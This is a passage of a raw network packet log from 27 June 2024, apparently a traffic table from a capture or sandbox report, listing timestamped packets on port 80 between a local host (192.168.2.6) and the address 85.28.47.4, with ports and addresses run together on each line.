                                                                Jun 27, 2024 05:58:05.641709089 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.641721964 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.641748905 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.641761065 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.641827106 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.641840935 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.641854048 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.641868114 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.641868114 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.641882896 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.641882896 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.641906023 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.641927958 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.642096996 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.642144918 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.642319918 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.642334938 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.642349005 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.642363071 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.642364025 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.642374039 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.642379045 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.642391920 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.642395973 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.642407894 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.642417908 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.642421961 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.642436028 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.642443895 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.642450094 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.642463923 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.642467022 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.642477989 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.642492056 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.642515898 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.643105984 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.643124104 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.643136024 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.643150091 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.643157959 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.643162966 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.643167973 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.643174887 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.643189907 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.643194914 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.643203020 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.643214941 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.643218040 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.643232107 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.643239021 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.643263102 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.643636942 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.643652916 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.643666029 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.643678904 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.643683910 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.643692970 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.643701077 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.643706083 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.643719912 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.643727064 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.643743992 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.643764973 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.644104004 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.644121885 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.644136906 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.644150972 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.644155979 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.644164085 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.644175053 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.644176960 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.644192934 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.644198895 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.644229889 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.713567972 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.713603020 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.713615894 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.713684082 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.713705063 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.713746071 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.713757038 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.713767052 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.713779926 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.713783979 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.713816881 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.718416929 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.718468904 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.718534946 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.718547106 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.718580008 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.718651056 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.718661070 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.718669891 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.718683004 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.718709946 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.718709946 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.718736887 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.722419024 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.722481012 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.722491980 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.722505093 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.722532988 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.722629070 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.722640038 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.722650051 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.722662926 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.722676039 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.722700119 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.722872019 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.722884893 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.722902060 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.722913027 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.722920895 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.722924948 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.722939014 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.722939014 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.722961903 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.722982883 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.723238945 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.723287106 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.723381042 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.723392010 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.723401070 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.723411083 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.723423958 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.723426104 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.723438025 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.723448038 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.723453045 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.723464012 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.723527908 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.723754883 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.723803043 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.723840952 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.723851919 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.723886967 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.724036932 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.724047899 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.724057913 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.724069118 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.724081039 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.724081993 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.724102020 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.724121094 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.724315882 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.724327087 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.724335909 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.724351883 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.724363089 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.724364996 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.724376917 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.724387884 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.724390030 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.724412918 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.724430084 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.727700949 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.727752924 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.727770090 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.727780104 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.727813005 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.727933884 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.727945089 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.727953911 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.727965117 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.727981091 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.727993965 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.728015900 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.728888035 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.728902102 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.728924036 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.728935957 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.728939056 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.728949070 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.728961945 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.728964090 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.728976011 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.728984118 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.728987932 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.729006052 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.729015112 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.729020119 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.729028940 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.729032993 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.729043961 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.729055882 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.729058027 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.729077101 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.729083061 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.729099035 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.729120970 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.729127884 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.729163885 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.729171991 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.729212046 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.729253054 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.729298115 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.729433060 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.729477882 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.729501963 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.729512930 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.729538918 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.729556084 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.729708910 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.729721069 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.729731083 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.729742050 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.729756117 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.729777098 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.729954958 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.729969978 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.729979992 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.729999065 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.730000973 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.730014086 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.730025053 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.730032921 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.730036974 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.730050087 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.730051994 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.730060101 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.730065107 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.730084896 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.730108023 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.730525017 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.730571032 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:06.036576986 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:06.042577982 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:06.741636038 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:06.741731882 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:06.811573029 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:06.816798925 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:07.518026114 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:07.518095016 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:08.328393936 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:08.333255053 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.027452946 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.027667999 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.304641962 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.309751987 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.480051041 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.480106115 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.480118036 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.480182886 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.480195999 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.480207920 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.480392933 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.480405092 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.480417013 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.480428934 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.480424881 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.480424881 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.480473995 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.480473995 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.480473995 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.480612040 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.480623960 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.480635881 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.480648041 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.480663061 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.480684042 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.562474966 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.562504053 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.562516928 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.562655926 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.562655926 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.562773943 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.562788010 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.562804937 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.562818050 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.562823057 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.562849998 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.562882900 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.563091040 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.563112020 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.563129902 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.563139915 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.563144922 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.563150883 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.563158035 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.563169956 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.563170910 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.563180923 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.563189030 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.563191891 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.563205004 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.563205957 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.563240051 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.563899040 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.563913107 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.563925028 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.563939095 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.563951015 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.563951015 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.563962936 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.563966990 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.563980103 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.563992977 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.563993931 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.564018965 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.564037085 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.567106009 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.567156076 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.644458055 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.644639969 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.644669056 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.644680977 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.644691944 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.644706011 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.644717932 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.644721985 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.644730091 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.644742012 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.644784927 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.644958973 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.644970894 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.645011902 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.645112991 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.645123959 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.645134926 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.645147085 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.645159006 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.645162106 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.645186901 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.645200968 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.645472050 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.645520926 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.645608902 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.645620108 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.645631075 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.645648003 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.645658970 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.645661116 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.645672083 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.645684004 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.645684958 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.645694971 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.645720959 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.646174908 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.646187067 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.646198034 CEST804971185.28.47.4192.168.2.6
